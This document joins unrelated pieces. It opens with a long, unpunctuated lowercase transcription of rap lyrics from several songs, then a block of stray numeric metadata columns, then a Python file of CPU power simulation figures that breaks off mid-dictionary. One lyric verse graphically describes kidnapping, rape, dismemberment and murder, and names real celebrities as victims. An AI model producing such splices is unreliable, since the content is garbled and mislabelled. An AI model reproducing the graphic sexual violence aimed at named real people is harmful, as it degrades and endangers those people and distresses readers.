it's not a big deal it's nothin' but some cash let's go 50 cent who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know eminem when me and fif' got together to do this music the more we became enveloped we 
just developed a fellowship through it it's no pretend shit it's friendship mi nemesis es su nemesis same for him it's just media see to them it's just images but this shit is no gimmicks this is blood in and blood out when it's beef you just gotta know when to butt in and butt out if there's a problem we solve it if we don't resolve it it usually just evolves into one big brawl and we all get involved in it and we should all get a merit this much beef we inherit and wear it like a badge with honor pass it around and share it and let it go to whoever's holdin' the most current beef on their shoulders and their soldiers got their backs 'til it's over but tonight we ain't come in here to beef with nobody we came to party banks cahis and mr ferrari so it's shady aftermizath back in that ass you izzask come izzon what kinda fizzuckin' quizzestion is that 50 cent eminem who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know who run it i said you know but you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know cahis pistol play ricochet see where the victim lay slumped over bleedin' jfk hk 'til your chest plate cave i'ma ride to the death do you rep that way forever i'ma be a shady 74 gangsta pussy i'll survive everything you got in that chamber i thrive off of danger jumpin' in all beef you keep talkin' shit now the squad have called me 4 lloyd banks enough holdin' back the steam em let off a magazine dappadon cappa queens mixed in with cahis creams started off with half a dream developed into what you see tellin' ain't my cup of tea can't tell i'm a fuckin' g i'm on automatic when i'm at it start static and you splattered shit shattered i'm a walkin' bitch magnet spit it how i live it live it allway to the limit and i'm always on my pivot for my digits you dig it see 50 cent who 
run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know tony yayo you know who this is shady gunit aftermath lloyd banks cahis marshall mathers ferrari f50 it's a movement you can't stop it talk of new york tony yayo pt i hands up officer dont shoot then pull your pants up promise you won't loot we may never understand each other its no use we aint ever gonna grasp what each other goes through black boy black boy we ain't gonna lie to you black boy black boy we don't like the sight of you pull up on the side of you window rolled down 'profile' then we wonder why we see this side of you probably comin' from the dope house we could let you slide but your tail light is blew out we know you're hidin' that heidi klum on you another drug charge homie it's back inside for you and just in case a chase might ensue we got that tried and true pistol drew right at you we'd be delighted to unload it in your back then walk up and lay that taser on the side of you fucked up but what the fuck am i to do i keep tellin' myself keep doin' like you're doin' no matter how many lives you ruin it's for the red white and blue time to go find a new one and split his head right in two no one's ever indicted you why 'cause you're a eminem cheech and chong white boy white boy you're a rockstar my momma talkin' to me tryna tell me how to live white boy white boy in your cop car but i don't listen to her 'cause my head is like a sieve white boy white boy you're untouchable the world's coming to an end i don't even care nobody can tell me shit 'cause i'm a big rockstar black boy black boy we don't get your culture and we don't care what our government's done to fuck you over man don't tell 
us your attitude's a result of that balderdash whered you get the chip on your shoulder at why you kicking that soda can pull your pants up we 'bout to roll up and throw your ass in the van cuffed you don't have to know our plans or what our intentions are our cards are close to our chest you better show your hands and put our minds more at ease or get shot in the thyroid comply or die boy we're fightin' a crime war here come the swine tryna clean up the streets from all these minorities that's what we call 'em pigsties for they're like eyesores to police talk to you like just a piece of trash feels like we're stuck in a time warp to me as i kick these facts and get these mixed reactions as this beat backspins it's like we're drifting back in to the sixties having black skin is risky 'cause this keeps happening throughout history africanamericans have been treated like shit and i admit there have been times where it's been embarrassin' to be a eminem cheech and chong white boy white boy you're a rockstar my momma talkin' to me tryna tell me how to live white boy white boy in your cop car but i don't listen to her 'cause my head is like a sieve white boy white boy you're untouchable the world's coming to an end i don't even care nobody can tell me shit 'cause i'm a big rockstar pt ii seems like the average lifespan of a white man is more than twice than a black life span i wonder sometimes if it has a price scanner i feel like checking out on life can't escape this circumstance i'd rather hear 'em say die nword than die antwoord ninja now it's better disguised banter but that's life strapped 'cause we're strapped financially and can't find answers we're applying but mcdonald's seems to be the only franchise that'll hire so how can we have higher standards as dallas overshadows the battle for black lives matter we fight back with violence but acts like that are black eyes on the movement which makes black lives madder at cops and cops madder that's why it's at a 
stalemate and can't arrive at a compromise so it's black ops i wonder if we hire more black cops the crap stops the block is our backyards officers not the crack spot call the attack dogs off of us man you always act all pissed off at us at a traffic stop and bad cops fuck it up for the good cops and man stop sendin' white cops in the black neighborhoods who ain't acclimated to 'em like that's the way to do it who seen some fuckin' videos of rappers waving guns and know nobody black so they act afraid of us and that's racism the fear that a black face gives 'em a subconscious racist wait why are there black neighborhoods 'cause america segregated us designated us to an area separated us sectioneight'd us when we tear it ups the only time attentions paid to us and education sucks and every day's another freddie gray for us a levy breaks or fuzz why is it they treat us like dryer lint we just want a safe environment for our kids but cant escape the sirens dont take a scientist to see our violent nature lies in the poverty that we face so the crime rates the highest in the lowest classes it's like a razor wire fence and were trapped in these racial biases that plague our society which makes our anxiety levels raise every time we see a devils face lions tigers and bears oh my it's more like billy clubs and gats and we really love it when you think were guilty cause were black but you kill each other facts you peel each other's caps for silly stuff like hats single mother strugglin through substance abuse while people with nothin' to lose shoot each other for shoes fuck your republican views pull ourselves up by our bootstraps where the fuck are the boots and streets act as a narrator don't gotta read comics or be that into characters just to see that just to be black you better be strapped with a derringer or be capped in america like steve rogers 'cause no one oversees these cops and all we see is 'em beat charges we done seen 'em beat rodney king unconscious and got 
off so we don't need all you crooked police officers' peace offerings just keep marchin' 'til we reach congress but they're gonna say you're tryin' to take an irrational stance if you try to slander the flag but somebody has to be the sacrificial lamb so they call it a kaepernick tantrum if you don't stand for the national anthem we raise it you better praise it or you'll be made to feel like a traitor we'll treat you like rodney dangerfield home of the brave is still racist 'ville so this whole nation feels like a plantation field in a country that claims that its foundation was based on united states ideals that had its natives killed got you singin' this starspangled spiel to a piece of cloth that represents the land of the free that made people slaves to build verse eminem you know it's devil's night the way that i smash the face of a punk in mask of jason is a fashion statement since drunken master tapes been a basket case and if that's the case then i'm dunkin' fascination with masturbation and humpin' lacerations and masking tape and i'm bumpin' some masta ace roll up posin' as pastor mase at a luncheon see andrea yates grab her face then i'm punchin' crack her fuckin' skull with an antique vase kill her husband to the back of the station wagon she's dragged and placed in the trunk and now i'm wanted for kidnappin' rape and abduction spread her legs like land o'lakes that i'm cuttin' 'til every fuckin' limb's either amputated or punctured decapitated christina applegate and i rap like i'm agitated no chill but i'm half sedated a functioning addict wait i'm in london brains underwear a pantywaist classic case of disfunction aggravated assault it was rap related you activated a gunman this game's oversaturated with junk and you punks couldn't get a hit from a database with a thumbprint razors and matches path is laid for destruction put jason mraz's face in his ass then i'm snatchin' anne hathaway she scratchin' like jam master jay on the one's and two's i 
slash away then i'm dumpin' her ass in a lake placid for alligators after i use the fuckin' tire thumper to bash her brains in for nothin' the murder weapons i stash 'em away on runyon man the kind of balls that it has to take and the gumption lack of class displayed but such a vast array in abundance of sad disgraceful and bad distasteful redundance and bitch i'm hung like candy canes if you're wonderin' balls come at you like batting cages i'm raw like big daddy kane is i'm comin' like i'm ejaculatin' and nuttin' come catch the clap like you're pattycakin' lil' dumplin' or brace yourself like a cast and be the last to make an assumption i'm back like i'm in the bathroom takin' a dump and it's back in the day or somethin' i'll shit on you devil's night how's that for a duction champtown get your rusty ass over 'fore i put a shine to it see man it's man i trust so i'mma rhyme to it 0 out of a hundred groups are mediocre they took a medicine effect and i'm a pretty choker so once you got a couple microphones well i'mma rep 'em you got some nile rapper rivers too well i'mma check 'em because they new to this i'm true to this they shouldn't be doin' this a lot of rappers reppin' keepin' miles is a few in this game to maintain i keep it going on you hear the and the funky beat i'm flowin' on i don't tell 'em when i see it i just spot it just runnin' me have soul and ain't the only person got it and blacks don't have to act white if they like red hot chili peppers and whites dont have to act black if they like saltnpepa cause i like a lot of people mucus on the so i'm blackened like metallica look at me in shock but nothing else matters wherever i may roam the microphone's my best friend and the stage is my home our music got the sounds our rhythms got the hooks i listen to kenny rogers marvin gaye and garth brooks i listened to that that's and but music is good music the other is mess the you chocolate and a peppermint what color is my soul here's a hint let's hook 
'em"]
| 26,141.333333
| 48,151
| 0.774074
| 33,408
| 156,848
| 3.634549
| 0.18771
| 0.004843
| 0.002882
| 0.002446
| 0.282129
| 0.272543
| 0.262183
| 0.256558
| 0.253148
| 0.250636
| 0
| 0.002662
| 0.209662
| 156,848
| 5
| 48,152
| 31,369.6
| 0.976759
| 0
| 0
| 0
| 0
| 1
| 0.999579
| 0.002059
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.6
| 0.4
| 0
| 0.4
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
f3e0a6687547be2fb0919284dab059c9f500e713
| 68,615
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.111939,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.29061,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.603482,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.328402,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.568674,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.326151,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.22323,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.23209,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.40904,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.114011,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0119048,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.128037,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0880436,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.242048,
'Execution Unit/Register Files/Runtime Dynamic': 0.0999484,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.340057,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.732774,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.75194,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00156835,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00156835,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.001368,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00053065,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00126475,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00576945,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0149669,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0846385,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.38374,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.227921,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.287471,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.86754,
'Instruction Fetch Unit/Runtime Dynamic': 0.620766,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0821668,
'L2/Runtime Dynamic': 0.0156952,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.31609,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.02046,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0672597,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0672597,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.635,
'Load Store Unit/Runtime Dynamic': 1.41942,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.165851,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.331702,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.058861,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0600451,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.334741,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0375123,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.594999,
'Memory Management Unit/Runtime Dynamic': 0.0975574,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.1504,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.397757,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.021579,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.16241,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.581746,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.48712,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0372236,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.231926,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.200027,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.134325,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.216661,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.109363,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.46035,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.122963,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.41643,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0377894,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0056342,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0547189,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0416683,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0925083,
'Execution Unit/Register Files/Runtime Dynamic': 0.0473025,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
